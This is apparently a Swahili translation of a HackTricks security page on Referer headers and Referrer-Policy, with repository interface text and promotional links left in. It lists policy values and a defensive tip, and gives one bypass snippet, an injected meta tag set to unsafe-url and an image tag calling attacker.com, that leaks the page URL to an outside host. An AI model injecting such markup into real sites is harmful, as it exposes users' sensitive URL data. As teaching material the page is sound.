Vichwa vya Rufaa na Sera

Rufaa ni kichwa kinachotumiwa na vivinjari kuonyesha ukurasa uliotembelewa kabla.

Taarifa nyeti zilizovuja

Ikiwa kwa wakati fulani ndani ya ukurasa wa wavuti kuna taarifa nyeti iliyopo kwenye vigezo vya ombi la GET, ikiwa ukurasa una viungo kwa vyanzo vya nje au mshambuliaji anaweza kufanya/kupendekeza (ujanja wa kijamii) mtumiaji atembelee URL inayodhibitiwa na mshambuliaji. Inaweza kuweza kuchota taarifa nyeti ndani ya ombi la GET la hivi karibuni.

Kupunguza Hatari

Unaweza kufanya kivinjari kifuatilie Sera ya Rufaa ambayo inaweza kuzuia taarifa nyeti kutumwa kwa programu zingine za wavuti:

Referrer-Policy: no-referrer
Referrer-Policy: no-referrer-when-downgrade
Referrer-Policy: origin
Referrer-Policy: origin-when-cross-origin
Referrer-Policy: same-origin
Referrer-Policy: strict-origin
Referrer-Policy: strict-origin-when-cross-origin
Referrer-Policy: unsafe-url

Kupinga-Kupunguza

Unaweza kubadilisha sheria hii kwa kutumia lebo ya meta ya HTML (mshambuliaji anahitaji kutumia na kuingiza HTML):

<meta name="referrer" content="unsafe-url">
<img src="https://attacker.com">

Ulinzi

Usiweke data yoyote nyeti ndani ya paramita za GET au njia katika URL.

Support HackTricks

Angalia mpango wa michango!
Jiunge na 💬 Kikundi cha Discord au kikundi cha telegram au tufuate kwenye Twitter 🐦 @hacktricks_live.
Shiriki mbinu za udukuzi kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud github repos.

{% endhint %}

3.4 KiB Raw Blame History

Vichwa vya Rufaa na Sera

Taarifa nyeti zilizovuja

Kupunguza Hatari

Kupinga-Kupunguza

Ulinzi

3.4 KiB

Raw Blame History